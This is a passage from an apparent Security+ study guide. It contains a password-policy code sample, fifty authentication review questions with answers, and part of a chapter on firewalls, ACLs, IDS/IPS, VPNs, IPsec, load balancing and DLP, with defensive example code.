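                   any(c in string.punctuation for c in password))
        return sum(classes) >= 3


class UserAccount:
    def __init__(self, username: str, password: str, policy: PasswordPolicy, now: int):
        self.username = username
        self.policy = policy
        self.salt = os.urandom(16)
        self.history: List[bytes] = [self._hash(password)]  # last entry is current
        self.last_change = now
        self.failed = 0
        self.first_fail: Optional[int] = None
        self.locked_until: Optional[int] = None

    def _hash(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, PBKDF2_ROUNDS)

    def change_password(self, new_password: str, now: int) -> Tuple[bool, str]:
        if now - self.last_change < self.policy.min_age_s:
            return False, "minimum password age not met"
        if not self.policy.is_complex(new_password, self.username):
            return False, "does not meet complexity requirements"
        digest = self._hash(new_password)
        if any(hmac.compare_digest(digest, old) for old in self.history):
            return False, "password reused"
        self.history = (self.history + [digest])[-self.policy.history:]
        self.last_change = now
        return True, "changed"

    def logon(self, password: str, now: int) -> Tuple[bool, str]:
        if self.locked_until is not None:
            if now < self.locked_until:
                return False, "account locked"
            self.locked_until, self.failed, self.first_fail = None, 0, None
        # the bad-attempt counter is cleared once the reset window has passed
        if self.first_fail is not None and now - self.first_fail > self.policy.reset_counter_s:
            self.failed, self.first_fail = 0, None
        if hmac.compare_digest(self._hash(password), self.history[-1]):
            self.failed, self.first_fail = 0, None
            return True, "ok"
        self.failed += 1
        if self.first_fail is None:
            self.first_fail = now
        if self.failed >= self.policy.lockout_threshold:
            self.locked_until = now + self.policy.lockout_duration_s
            return False, "account locked"
        return False, "bad password"
```

The minimum password age is what gives the history setting its teeth: without it, a user can change their password 12 times in a minute and land back on the original. The lockout threshold stops online guessing, but note that it also lets an attacker who knows a username lock that user out on purpose, which is why the duration and reset window are kept short rather than requiring an administrator to unlock every account.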

Review questions

  1. What is the most common form of authentication, and the one most likely to be entered incorrectly?

  2. When I purchase a new wireless access point, what should I do first?

  3. What is password history?

  4. How can I prevent someone from reusing the same password?

  5. Explain what format a complex password takes.

  6. How can I prevent a hacker from trying passwords many times?

  7. What type of authentication factor is a smart card?

  8. How many factors is it if I have a password, a PIN, and a date of birth?

  9. What is biometric authentication?

  10. What authentication method can be used by two third parties who participate in a joint venture?

  11. What is an XML-based authentication protocol?

  12. What is Shibboleth?

  13. What protocol is used to store and search for Active Directory objects?

  14. What is the format of a distinguished name for a user called Fred who works in the IT department of a company whose domain is CompanyA.com?

  15. What authentication protocol uses tickets, timestamps, and sequence numbers, and is used to prevent replay attacks?

  16. Which Stratum time server is the reference time source?

  17. What is a ticket granting ticket (TGT) session?

  18. What is single sign-on? Give two examples.

  19. How can I prevent a pass-the-hash attack?

  20. Give an example of when you would use OpenID Connect.

  21. Name two AAA servers and the ports associated with them.

  22. What is accounting used for in an AAA server?

  23. What is the purpose of a virtual private network (VPN) solution?

  24. Why should we never use PAP authentication?

  25. What type of device is an iris scanner?

  26. What are two drawbacks of using facial recognition?

  27. What is a Type II error in biometric authentication, and why is it a security risk?

  28. What is a time-limited password?

  29. How many times can you use a HOTP password? Is there a time restriction associated with it?

  30. How does a CAC differ from a smart card, and who uses a CAC?

  31. What port-based authentication protocol authenticates both users and devices?

  32. What type of account is a service account?

  33. How many accounts should a system administrator in a multinational corporation have, and why?

  34. What do I need to do when I purchase a baby monitor, and why?

  35. What is a privileged account?

  36. What is the drawback for security if the company uses shared accounts?

  37. What is a default account? Is it a security risk?

  38. The system administrator in a multinational corporation creates user accounts using each employee's first name and last name. Why does he do this every time?

  39. What two actions do I need to complete when John Smith leaves the company?

  40. What is account recertification?

  41. What is the purpose of a user account review?

  42. What can I implement to find out immediately when a user is placed in a group that may give them a higher level of privilege?

  43. What are the two possible outcomes if an auditor finds working practices that do not conform to company policy?

  44. If a contractor brings in five consultants for a two-month mail server migration, how should I set up their accounts?

  45. How can I ensure that the contractors in Question 44 can only access the company network from 9 a.m. to 5 p.m. daily?

  46. If I have a company with five consultants who work different shift patterns, how can I set up their accounts so that each of them can only access the network during their individual shift?

  47. A brute-force attack tries all combinations of characters and will eventually crack a password. What can I do to prevent a brute-force attack?

  48. The IT team have a global group called IT Admin; each member of the IT team is a member of this group and therefore has full control of the departmental data. Two new apprentices are joining the company and need read access to the IT data. How can you achieve this with the minimum administrative effort?

  49. I have different login details and passwords for Airbnb, Twitter, and Facebook, but I keep getting them mixed up and have locked myself out of these accounts from time to time. What can I implement on my Windows 10 laptop to help me?

  50. I have moved departments but the employees in my old department still use my old account for access. What should the company have done to prevent this, and what should their next action be?

Answers and explanations

  1. A password is most likely to be entered incorrectly; the user may forget the password or may have Caps Lock on.

  2. When purchasing any device, you should change the default username and password, as many of these are published on the internet and could be used to access your device.

  3. Password history is the number of previous passwords that are remembered and cannot be reused. Some third-party applications or systems call this a password reuse list.

  4. Set up password history combined with a minimum password age. If I set the minimum password age to 1 day, a user can change their password at most once per day, which stops them cycling quickly through passwords to get back to the old one.

  5. A complex password uses at least three of the four character classes: uppercase letters, lowercase letters, numbers, and special (non-alphanumeric) characters.

  6. If I set up account lockout with a low threshold such as three, the hacker must guess the password within three attempts or the account is locked out.

  7. A smart card with a PIN is two-factor (multi-factor) authentication: the card is something you have and the PIN is something you know.

  8. A password, a PIN, and a date of birth are all things you know, so this is single-factor authentication.

  9. Biometric authentication uses a part of your body or your voice to authenticate, for example your iris, retina, palm, or fingerprint.

  10. Federated services are an authentication method that can be used by two third parties; they use SAML and extended attributes such as employee ID or email address.

  11. Security Assertion Markup Language (SAML) is an XML-based standard for exchanging authentication and authorization data, used with federated services.

  12. Shibboleth is an open source, SAML-based federation services implementation.

  13. The Lightweight Directory Access Protocol (LDAP) is used to store and search Active Directory objects such as users, printers, groups, or computers, which are held in the X.500 format.

  14. The distinguished name in the ITU X.500 format is CN=Fred,OU=IT,DC=CompanyA,DC=com.

  15. Kerberos, the authentication protocol used by Active Directory, uses tickets, timestamps, and sequence numbers, which together prevent replay attacks.

  16. Stratum 0 is the reference time source. A Stratum 1 server is set up internally and obtains its time directly from the Stratum 0 device.

  17. A Ticket Granting Ticket (TGT) session is where a user logs in to an Active Directory domain using Kerberos: the domain controller authenticates the user and issues a TGT that is later exchanged for service tickets.

  18. Single sign-on is where a user enters their credentials only once and then accesses different resources, such as email and files, without re-entering them. Examples are Kerberos, federated services, and a smart card.

  19. Pass-the-hash attacks exploit NTLM authentication, which older systems such as Windows NT 4.0 depend on. You can prevent it by disabling or restricting NTLM so that Kerberos is used instead.

  20. OpenID Connect is where you access a device or portal using your Facebook, Twitter, Google, or Hotmail credentials. The portal itself does not manage the account.

  21. The first AAA server is RADIUS, an open (non-proprietary) standard that uses UDP port 1812 for authentication and UDP port 1813 for accounting. The second is Cisco's TACACS+, which uses TCP port 49. Diameter is a more modern, more secure successor to RADIUS.

  22. Accounting in an AAA server logs when someone logs in and logs out; this can be used for billing purposes. Accounting records are normally stored in a database such as SQL.

  23. A VPN solution creates a secure tunnel from a remote location to your corporate network, or vice versa. For the exam, the most secure tunneling protocol is L2TP/IPSec.

  24. PAP authentication sends the password in clear text; it could easily be captured by a packet sniffer.

  25. An iris scanner is a physical device used for biometric authentication.

  26. Facial recognition can be affected by lighting or by turning your head slightly to one side, and some older facial recognition systems accept a photograph. Microsoft Windows Hello is much better, as it uses infrared and is neither fooled by a photograph nor affected by light.

  27. A Type II error in biometric authentication is a false acceptance, measured by the False Acceptance Rate (FAR): people who are not permitted to access your network are given access.

  28. A time-based one-time password has a short lifetime of 30 to 60 seconds.

  29. HOTP is a one-time password that can be used only once but does not expire until it is used.

  30. A CAC is similar to a smart card in that it uses certificates, but the CAC is used by the US military; it has a picture and the details of the user on the front, and their blood group and Geneva Convention category on the reverse.

  31. IEEE 802.1X is port-based authentication that authenticates both users and devices.

  32. A service account is a type of administrative account that allows an application to run with a higher level of privilege on a desktop or server. An example is a service account used to run an anti-virus application.

  33. A system administrator should have two accounts: a user account for day-to-day tasks and an administrative account for administrative tasks.

  34. When I purchase a baby monitor I should rename the default administrative account and change the default password, to prevent someone using it to get into my home network.

  35. A privileged account is an account with administrative rights.

  36. When monitoring and auditing are carried out, the employee responsible for an action cannot be traced if more than one person shares the account. Shared accounts should be eliminated for monitoring and auditing purposes.

  37. Default accounts and passwords for devices and software can be found on the internet and used to hack your network or home devices; ovens, TVs, baby monitors, and refrigerators are examples.

  38. The system administrator is using a standard naming convention.

  39. When John Smith leaves the company, you need to disable his account and reset the password. Do not delete the account immediately, as deleting it removes the SID and would break access to the data he owned.

  40. Account recertification is an audit of user accounts and permissions, usually carried out by an auditor; it is also known as a user account review.

  41. A user account review ensures that old accounts have been removed and that all current users have the appropriate access to resources and no higher level of privilege than they need.

  42. A SIEM system can carry out active monitoring and notify the administrators of any changes to user accounts or logs.

  43. Following an audit, either change management or a new policy will be put in place to rectify any area not conforming to company policy.

  44. The contractors' accounts should have an expiry date equal to the last day of the contract.

  45. Rule-based access control should be adopted so that the contractors can access the company network only from 9 a.m. to 5 p.m. daily.

  46. Time and day restrictions should be set up on each individual's user account to match their shift pattern.

  47. Account lockout with a low threshold will prevent brute-force attacks.

  48. Create a group called IT Apprentices and add the apprentices' accounts to it. Give the group read access to the IT data.

  49. Credential Manager can store generic and Windows 10 credentials so that the user does not have to remember them.

  50. The company should have disabled the old account. A user account review now needs to be carried out to find any other accounts in a similar situation.

Understanding Network Components

In this chapter we are going to look at networking components and how they affect the security of your network; we will look at firewalls, switches, and routers. We will start by looking at the OSI reference model, which was created to standardize communication between devices.

We will cover the following exam objectives in this chapter:

OSI – reference model

The Open Systems Interconnection (OSI) reference model was created by the International Organization for Standardization (ISO) and is a reference model for communication. Each of its seven layers has different protocols and responsibilities. The Security+ exam focuses mainly on layers 2, 3, and 7:


Figure 1: OSI reference model

Here is a brief summary of each layer:

Layer 7, Application: the protocols that applications use directly, such as HTTP, SMTP, and DNS.

Layer 6, Presentation: data formatting, encryption, and compression.

Layer 5, Session: establishing, maintaining, and ending sessions between applications.

Layer 4, Transport: end-to-end delivery using TCP or UDP, addressed by port number.

Layer 3, Network: logical addressing and routing using IP; routers work here.

Layer 2, Data Link: MAC addressing and frames on the local segment; switches and ARP work here.

Layer 1, Physical: cables, radio, and the electrical or optical signals themselves.

When a protocol suite such as TCP/IP is designed, its protocols map onto some or all of the layers of this model.

Exam tip: When a switch is mentioned, it is a Layer 2 switch that can create VLANs. ARP operates at Layer 2 and an ARP attack must be done locally on the host.

Installing and configuring network components

There are many network components and topologies (layouts) that we need to know about to maintain a secure environment. We are going to look at each of these in turn. We need to know how each device is configured and which device is the most appropriate in different scenarios. We will start with the firewall, whose main job is to prevent unauthorized access to the network.

Firewall

A firewall prevents unauthorized access to the corporate network, and in the Security+ exam, we tend to use a back-to-back configuration, as shown here:


Figure 2: Back-to-back firewall configuration

You can see that neither firewall lets traffic pass through by default; this is because we open only the ports that we need. If Firewall 1 is traversed, then Firewall 2 will hopefully prevent access to the internal network, known as the local area network. To enable an application to pass through the firewall, we must open the port number for that application. Each application has a different port number; think of someone who wants to watch the news: Democrats watch CNN on Channel 21 and Republicans watch Fox News on Channel 29, and each TV programme has its own channel number. If we want to enable web access, we make an exception for Hypertext Trans&shy;fer Protocol (HTTP) on TCP port 80 and for HTTPS on TCP port 443. These are the ports every web server listens on, whichever browser the user runs: Internet Explorer, Microsoft Edge, Google Chrome, or Firefox.

Ports have a direction: outbound traffic comes from the internal network going to the external network, and inbound traffic comes from outside to the internal network. A stateless packet filter that opened only the outbound port 80 would let the request out but block the reply; a stateful firewall records the outbound connection in its state table and allows the matching reply back in without a separate inbound rule.


The main purpose of a firewall is to prevent unauthorized access to the network. The default setting is to block all traffic and allow only by exception. There are many different types of firewall:


Figure 3: Host-based firewall

As a host-based firewall is an application running on a desktop, it is vulnerable to attack: if someone stops the Windows Firewall service, the firewall is disabled and the computer becomes vulnerable. Remember from Chapter 4, Delving into Identity and Access Management, that services run under a service account, a type of administrative account. The following image shows the firewall service running:


Figure 4: Windows firewall service

Exam tip: A UTM firewall is an all-in-one security appliance that acts as a firewall and does content and URL filtering. It can also inspect malware.

Router

A router is a device that connects two different networks together, when setting up a host machine, it is known as the default gateway. It is used by your company to give you access to other networks, for example the internet. It has a routing table built into it, so it knows which route can be used to deliver network packets. The router is the IP equivalent of a post office sending letters around the world, but instead of letters, IP packets are being transported.

Access Control List (ACL): The router sits on the external interface and uses an ACL so that it can also filter the traffic coming into the network, by source and destination IP address, protocol, and port number.


Anti-spoofing: An anti-spoofing filter is placed on the input side of a router interface. On the internal interface it allows through only packets whose source address is within that subnet's address range, and on the external interface it drops packets arriving from the internet that claim an internal source address; either way, it excludes packets with invalid source addresses.

Access control list– network devices

The Access Control List (ACL) for network devices must not be confused with the ACL for files and folders; they are totally different. Two network devices that use an ACL are firewalls and routers. The ACL filters access by port number, protocol or application, and Internet Protocol (IP) address. When you install a new firewall or router there are no rules except the final rule of deny all. The default for either a router or a firewall is therefore to block all access, and you allow traffic by creating exceptions: allow rules for the traffic you want through. If no allow rule matches, the final deny rule applies; this is called an implicit deny.

Example:

John has been doing some online shopping and bought a pair of shoes, but he cannot download the new book that he bought. He used HTTP to gain access to the website, then went to the secure server for payment, using HTTPS to protect his credit card details; however, when he tries to download the book, the traffic is blocked by the firewall. The ACL allows TCP port 80 (HTTP) and TCP port 443 (HTTPS), but there is no allow rule for FTP, which uses TCP port 21:


Figure 5: Implicit deny

As there is no allow rule on the firewall for FTP traffic, when the FTP traffic arrives, it is checked against the allow rules, and if there is no matching rule, it then drops down to the last rule, denying all traffic – this is known as Implicit Deny. Although the example is for a firewall, an ACL is used by the router. Both devices are filtering incoming traffic.
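To make the first-match-then-implicit-deny logic concrete, here is a small packet-filter evaluator, added as an example; it is not code from the book or from any firewall vendor. The rule set, the anti-spoofing entry (which assumes 10.0.0.0/8 is the internal range), the `Rule`/`Packet` types and the sample packets are all constructed for illustration; a real firewall also matches on destination address, interface and connection state.

```python
"""First-match packet filter with an implicit deny, in the style of a firewall
or router ACL. Added example; not code from the book. The internal address
range, the rule set and the sample packets are constructed for illustration."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    proto: str             # "tcp", "udp" or "any"
    src: str               # CIDR block the source address must belong to
    dport: Optional[int]   # destination port; None matches any port


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dport: int


def evaluate(rules, packet):
    """Walk the ACL top to bottom and return (action, rule index) for the first
    rule that matches. Nothing matching means ("deny", None): the implicit deny."""
    src = ip_address(packet.src)
    for index, rule in enumerate(rules):
        if rule.proto != "any" and rule.proto != packet.proto:
            continue
        if src not in ip_network(rule.src):
            continue
        if rule.dport is not None and rule.dport != packet.dport:
            continue
        return rule.action, index
    return "deny", None


# Inbound ACL on the external interface of John's firewall (constructed).
# Rule 0 is the anti-spoofing filter: a packet arriving from the internet can
# never legitimately claim an internal (assumed 10.0.0.0/8) source address.
INBOUND_ACL = [
    Rule("deny",  "any", "10.0.0.0/8", None),   # anti-spoofing
    Rule("allow", "tcp", "0.0.0.0/0", 80),      # HTTP
    Rule("allow", "tcp", "0.0.0.0/0", 443),     # HTTPS
]

if __name__ == "__main__":
    for pkt in (Packet("tcp", "203.0.113.7", 80),    # HTTP: allowed by rule 1
                Packet("tcp", "203.0.113.7", 443),   # HTTPS: allowed by rule 2
                Packet("tcp", "203.0.113.7", 21),    # FTP: no rule, implicit deny
                Packet("tcp", "10.1.2.3", 80)):      # spoofed source: rule 0
        print(pkt.proto, pkt.src, pkt.dport, "->", evaluate(INBOUND_ACL, pkt))
```

Note that rule order matters: if the HTTP allow came before the anti-spoofing deny, a spoofed packet to port 80 would be let in, which is why deny rules for spoofed sources belong at the top of the list.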

Intrusion-prevention system

There are two types of Intrusion-Prevention Systems (IPS), the first is the Network Intrusion Prevention System (NIPS), which can only operate on your network and cannot work inside a host. The second is called the Host Intrusion Prevention System (HIPS), and it operates inside a host machine and cannot operate on the network.

NIPS is an internal network device whose role is to prevent access to the network, and it is placed on the perimeter of your network behind your firewall. Think of NIPS as Rambo with a big gun whose job it is to shoot the bad guys.

Intrusion-detection system

The Intrusion-Detection System (IDS) comes in the same two forms as the IPS: the HIDS, which only works on a host, and the NIDS, which only works on the network. The difference is that an IDS only detects and alerts, whereas an IPS can also block. Think of the IDS as Sherlock Holmes, the famous detective: his job is to find unusual traffic patterns on the network and then inform Rambo, the NIPS, who will then remove them from the network.

Exam tip: NIPS has the capability to detect as well as protect if there are no NIDS on your network. To protect a virtual machine from attack, you will install a HIPS.

Modes of detection

There are three modes of detection used by the NIPS/NIDS. For the purpose of the exam, you must know them thoroughly:

Exam tip: Anomaly-based NIPS/NIDS learn what normal traffic looks like and can therefore detect new attack patterns, whereas signature-based systems can only match known variants. The trade-off is that anomaly-based detection produces more false positives.

Modes of operation

There are different modes of operation for the sensors of the NIPS/NIDS:

When sensors are placed inside the network, they can only detect traffic once it is inside your network and has passed through your firewall. If you wish to detect attacks before they come into your network, the sensor must be placed on the external network to the firewall.

Monitoring data

The IPS/IDS analytics analyze the traffic they see against the rules configured inside the system. However, no system is foolproof: it tries its best but sometimes gives an outcome different from the one expected. There are two different types of error:

Exam tip:
A false positive is a false alarm: the system reports an attack that is not happening. A false negative is the dangerous one: the system detects nothing while you are actually being attacked.

Switch

A switch is an internal device that connects the hosts in a local-area network. The switch keeps a table listing the MAC addresses of the hosts connected to it:


Figure 6: Cisco switch

Once the switch has been installed, it builds up a MAC address table (not a routing table); each host is identified by its MAC address, learned from the source address of the frames it sends. The switch delivers each frame only to the port of the host that requires it, rather than flooding it to every port as a hub does. Switches can be stacked when there are more users than a single switch has ports for, typically 48:


Figure 7: Network connections

A computer has an Ethernet cable that plugs into a wall jack; the wall jack is connected to the patch panel by cables laid under floors or above ceilings, where a user cannot see them. From the patch panel, a cable goes into one port on the switch. Because it is very easy to plug a cable into a wall jack, the network administrator must place security on the switch. There are two main types, port security and 802.1x, plus other protection that can be configured:

Exam tip:
If you want to prevent someone plugging their laptop into a wall jack in a waiting area, use port security to shut that port down (or to restrict it to known MAC addresses). But if you want to prevent a rogue server or wireless access point from connecting to the network, use 802.1x port security, which authenticates the device before the port is opened.

Layer 3 switch

Traditional switches work at layer 2 of the OSI Reference Model and are susceptible to ARP attacks, such as ARP spoofing, because they forward frames purely by MAC address. A layer 3 switch also operates at the network layer: it routes packets between VLANs using IP addresses, just as a router does, and it is a high-performance device. Because its routing decisions between networks are made on IP addresses rather than MAC addresses, a layer 3 switch is not dependent on ARP in the way a layer 2 switch is; its access ports still operate at layer 2, however, so port-level protections remain necessary.

Proxy server

A proxy server is a server that acts as an intermediary for requests from clients seeking resources on the internet or an external network. Think of it as a go-between who makes requests on behalf of the client, ensuring that anyone outside of your network does not know the details of the requesting host.

The flow of data is from internal to external and it has three main functions: URL filter, content filter, and web page caching:


Figure 8: Proxy server

Reverse proxy

The flow of traffic from a reverse proxy is incoming traffic from the internet coming into your company network. The reverse proxy is placed in a boundary network called the Demilitarized Zone (DMZ). It performs the authentication and decryption of a secure session so it can filter the incoming traffic.

Example: If a company sets up a webinar through Skype or another video conference application, they can invite potential customers. All of the conferencing requests will pass through a reverse proxy that authenticates them and redirects their session to the relevant Skype server.

Remote access

There are times when people who are working remotely need to access the company's network to access resources. There are two main types of remote access:

Exam tip:
L2TP/IPsec is the only tunneling protocol in the exam objectives; you need to know it thoroughly, especially how IPSec works, both the Authentication Header (AH) and the Encapsulating Security Payload (ESP). The only other VPN that is mentioned is the legacy SSL VPN, which uses an SSL certificate.

Virtual private network using L2TP/IPSec

Before we look at the tunneling protocols, we need to learn a little about encryption. Encryption is the process of taking data in plaintext format and transforming it into ciphertext, a format that is unreadable without the key. Encryption is covered in depth later in this book; the two main types are:

Exam tip:
Symmetric encryption is used to encrypt and decrypt large amounts of data as it uses only one key, making it faster than asymmetric, which uses two keys.

A VPN creates a tunnel across the internet, normally from home or a remote site to your workplace. We need to look at the L2TP/IPSec tunnel: L2TP works at Layer 2 of the OSI Reference Model and carries the traffic, while IPSec is used to encrypt it. An IPSec packet is formed of two different portions:

IPSec

IPSec can be used to create a secure session between a client computer and a server. For example, you may have the financial data on a financial server. All members of the finance team will have IPSec tunnels created between their desktops and the financial server. This prevents anyone using a packet sniffer from reading data taken from the financial server, or from any session across the network, because the payload is encrypted on the wire.

IPSec can also be used as a VPN protocol as part of the L2TP/IPSec tunneling protocol that is used by the major vendors of VPN solutions, such as Cisco, Microsoft, SonicWall, or Check Point.

IPSec – handshake

The first stage of an IPSec session is to negotiate a security association (SA), the agreed set of keys and algorithms for the tunnel. In the Security+ exam the protocol that does this is called Internet Key Exchange (IKE). Diffie Hellman is used to agree the keys for the secure tunnel before the data is:


Figure 9: Diffie Helman

The IKE phase of the IPSec session runs over UDP port 500 (UDP port 4500 when NAT traversal is in use) and uses Diffie Hellman to agree keys. IKE phase 1 (main mode, or the faster but weaker aggressive mode) authenticates the peers and creates the IKE security association; IKE phase 2, known as quick mode, then negotiates the IPSec security associations inside it. This creates the secure session through which the data can flow.
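The exchange in Figure 9, worked through in code. This is an added example, not the book's material and not any VPN vendor's implementation. It uses the 1024-bit MODP prime that RFC 2409 defines as Oakley group 2 because it is short enough to show, and derives a session key with SHA-256 where IKE would use its negotiated pseudo-random function; the function names (`keypair`, `shared_secret`, `session_key`, `ike_phase1`) are illustrative. Group 2 is considered too weak for production IKE today; group 14 (2048 bit) or an elliptic-curve group should be used.

```python
"""Diffie-Hellman key agreement as run in the IKE phase of an IPsec session.
Added example, not from the book. Group 2 from RFC 2409 is used because it
is short; it is too weak for production use. Key derivation is simplified."""
import hashlib
import secrets

# RFC 2409 section 6.2: 1024-bit MODP prime (Oakley group 2), generator 2.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381"
    "FFFFFFFFFFFFFFFF", 16)
G = 2


def keypair(p=P, g=G):
    """Pick a random private exponent x and publish g^x mod p."""
    x = secrets.randbelow(p - 2) + 1          # 1 <= x <= p - 2
    return x, pow(g, x, p)


def shared_secret(my_private, their_public, p=P):
    """Both sides compute the same number: (g^a)^b = (g^b)^a mod p."""
    if not 1 < their_public < p - 1:          # reject 0, 1 and p-1 (trivial subgroups)
        raise ValueError("invalid peer public value")
    return pow(their_public, my_private, p)


def session_key(secret, p=P):
    """Turn the agreed number into a 256-bit key. IKE uses its negotiated PRF;
    plain SHA-256 stands in for it here."""
    nbytes = (p.bit_length() + 7) // 8
    return hashlib.sha256(secret.to_bytes(nbytes, "big")).digest()


def ike_phase1(p=P, g=G):
    """Run the exchange for both endpoints. Returns the initiator's key, the
    responder's key and the only values a sniffer on the path would see."""
    a, A = keypair(p, g)                      # initiator
    b, B = keypair(p, g)                      # responder
    k_i = session_key(shared_secret(a, B, p), p)
    k_r = session_key(shared_secret(b, A, p), p)
    seen_on_wire = {"p": p, "g": g, "A": A, "B": B}   # a and b never leave their hosts
    return k_i, k_r, seen_on_wire


if __name__ == "__main__":
    k_i, k_r, wire = ike_phase1()
    print("keys match:", k_i == k_r, "key:", k_i.hex())
```

An eavesdropper who captures p, g, A and B still has to solve the discrete logarithm problem to recover a or b, which is what makes the agreed key private even though every message crossed the internet in the clear. Note that Diffie-Hellman on its own does not authenticate the peers; IKE adds pre-shared keys or certificates for that.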

The second phase is where the data is encrypted with DES, 3DES, or AES. AES provides the most secure VPN session as it supports 128-, 192-, or 256-bit keys; DES and 3DES are legacy ciphers that should no longer be used. There are two different IPSec modes:

VPN concentrator

A VPN concentrator is a dedicated device that terminates many VPN tunnels at once: it sets up the secure tunnel during the IKE phase and then creates and maintains the full IPSec tunnel for each session. It is normally used when you have a site-to-site VPN or a large number of remote users.

Site-to-site VPN

A site-to-site VPN is where you have two different sites, with a VPN concentrator at each site, and it acts like a leased line between them. The session is set to always on, as opposed to dial on demand:


Figure 10: Site-to-site VPN

VPN always on versus on-demand

There are two main session types: the first is on-demand, where a remote worker initiates a VPN session from home or a remote location, and when they finish the session the connection is dropped. The second is where a site-to-site VPN is set up and the session is known as always on, where the session is permanent.

SSL VPN

SSL VPN is a VPN that can be used with a web browser that uses an SSL certificate for the encryption. It has been replaced in recent times with Transport Layer Security (TLS), which is a more modern version of SSL. In the Security+ exam, the SSL VPN is normally used for legacy VPNs that don't support L2TP/IPSec.

Exam tip:
SSL VPN is the only VPN in the objectives to use an SSL certificate, and it only needs a web browser to make a connection. Modern implementations use TLS, the more secure successor to SSL, with the same kind of certificate.

Split tunnelling

Split tunneling is where a VPN client sends company traffic through the secure VPN session but sends other traffic, such as ordinary web browsing, directly to the internet outside the tunnel. If a hacker compromises the user's machine through that unsecured session, they can ride the secure tunnel and gain access to your company's network:


Figure 11: Split tunnel

Example: John connects his L2TP/IPSec session into the company network, then he realizes that he needs a train ticket for tomorrow. Instead of dropping the secure session and then going to the rail website, he leaves it connected. Once he opens up his web browser, he is using HTTP on TCP port 80, which is unsecured. This means that while he has the web browser open, a hacker could access his desktop and use the secure tunnel to gain access to the company network.

Exam tip: A VPN should always set up a full tunnel, no other form of tunneling, such as split tunneling, should be used.

Load balancer

A network load balancer is a device that is used when there is a high volume of traffic coming into the company's network or web server. It can be used to control access to web servers, video conferencing, or email. In the Security+ exam, it is normally a high volume of web traffic. From Figure 12, you can see that the web traffic comes into the load balancer from the Virtual IP address (VIP) on the frontend and is sent to one of the web servers in the server farm:


Figure 12: Load balancer

The load balancer has selected to send the request to Web 3, which has the least number of requests (50), and Web 4 will not be considered as it is currently offline. A user requesting three different pages may obtain them from different web servers but may not know this as the load balancer is optimizing the delivery of the web pages to the user.


Figure 13: DNS Round Robin

DNS round robin is a simpler alternative to a load balancer. The DNS server holds one address record for each web server under the same host name and rotates the order in which it returns them, so the first client is sent to Web 1, the next to Web 2, the next to Web 3, and then the sequence goes back to Web 1 on a rotational basis. No load balancer sits in the path, but the DNS server has no health check, so it keeps handing out an offline server's address.
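The two selection methods side by side, as an added example that is not part of the book. The `Backend` type, the addresses and the connection counts other than Web 3's 50 are constructed (Figure 12 only gives Web 3 = 50); `least_connections` models the load balancer's choice and `RoundRobin` models what a DNS server handing out rotated records does.

```python
"""Two ways a request reaches a web server: a load balancer choosing by least
connections, and DNS round robin. Added example, not from the book. The
addresses and connection counts other than Web 3 = 50 are constructed."""
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass
class Backend:
    name: str
    ip: str
    active_connections: int = 0
    online: bool = True


SERVER_FARM = [
    Backend("Web 1", "10.0.5.11", active_connections=120),
    Backend("Web 2", "10.0.5.12", active_connections=80),
    Backend("Web 3", "10.0.5.13", active_connections=50),
    Backend("Web 4", "10.0.5.14", active_connections=0, online=False),  # offline
]


def least_connections(backends):
    """What the load balancer in Figure 12 does: ignore offline members and
    send the request to the live server with the fewest active connections."""
    live = [b for b in backends if b.online]
    if not live:
        raise RuntimeError("no backend available")
    return min(live, key=lambda b: b.active_connections)


class RoundRobin:
    """DNS round robin: the name server returns the address records in
    rotation, so clients are sent to Web 1, Web 2, Web 3, Web 1, ... There is
    no health check, so an offline server is still handed out."""

    def __init__(self, backends):
        self.ring = sorted(backends, key=lambda b: ip_address(b.ip))
        self.position = 0

    def next(self):
        chosen = self.ring[self.position]
        self.position = (self.position + 1) % len(self.ring)
        return chosen


if __name__ == "__main__":
    print("least connections ->", least_connections(SERVER_FARM).name)
    rr = RoundRobin(SERVER_FARM[:3])
    print("round robin ->", [rr.next().name for _ in range(4)])
```

The contrast is the point: the load balancer never picks Web 4 because it knows it is offline, whereas round robin over all four records sends every fourth client to the dead server.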

Clustering

Clustering is where two servers share a quorum disk on the backend. The normal setup is the active-passive configuration, as shown in Figure 14, and it is commonly used for email or database servers:


Figure 14: Clustering.

In the preceding diagram, the request comes to the Virtual IP that sends the request to the active node that fulfils the request. In the background, the passive node is also connected to the shared disk, but has a heartbeat polling the active node. If the active node fails, the passive takes over.

The other mode of clustering is where both nodes are active in an active-active configuration. With this configuration, both nodes need to have enough resources to act as a dual active node without suffering from a bottleneck.

Data-loss prevention

Data Loss Prevention (DLP) can stop unencrypted sensitive and personally identifiable information (PII) from inadvertently leaving the company. It cannot scan encrypted data. There are two separate ways it can prevent data loss:

Example:

An auditor has found that the credit card details of customers have been sent out of the company by email, and this needs to be prevented in the future. The company only accepts VISA, Mastercard, and American Express.

The solution would be to set up a DLP template with the regular expression format for VISA, Mastercard, and American Express. As emails leave the company, they are scanned for this format and if it is included in an email, it is blocked and the security administrator is informed.
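The template described above, written out as code. This is an added example, not the book's text and not any DLP product's implementation. The e-mail is constructed from the publicly documented test card numbers for each brand, and the patterns cover the current VISA, Mastercard (including the 2221-2720 range) and American Express prefixes. A Luhn checksum is added so that order numbers or phone numbers that happen to look like a card are not blocked; the function names are illustrative.

```python
"""DLP-style credit card detection: a regular expression per card brand plus
a Luhn checksum to cut false positives. Added example, not from the book;
the sample e-mail is constructed from the usual public test card numbers."""
import re

# Candidate: 13 to 19 digits, allowing the spaces or dashes people type.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Brand patterns, applied to the digits with separators removed.
BRANDS = {
    "VISA": re.compile(r"4\d{12}(?:\d{3})?"),                       # 13 or 16 digits
    "Mastercard": re.compile(
        r"(?:5[1-5]\d{2}|2(?:22[1-9]|2[3-9]\d|[3-6]\d{2}|7[01]\d|720))\d{12}"),  # 16 digits
    "American Express": re.compile(r"3[47]\d{13}"),                 # 15 digits
}


def luhn_ok(digits):
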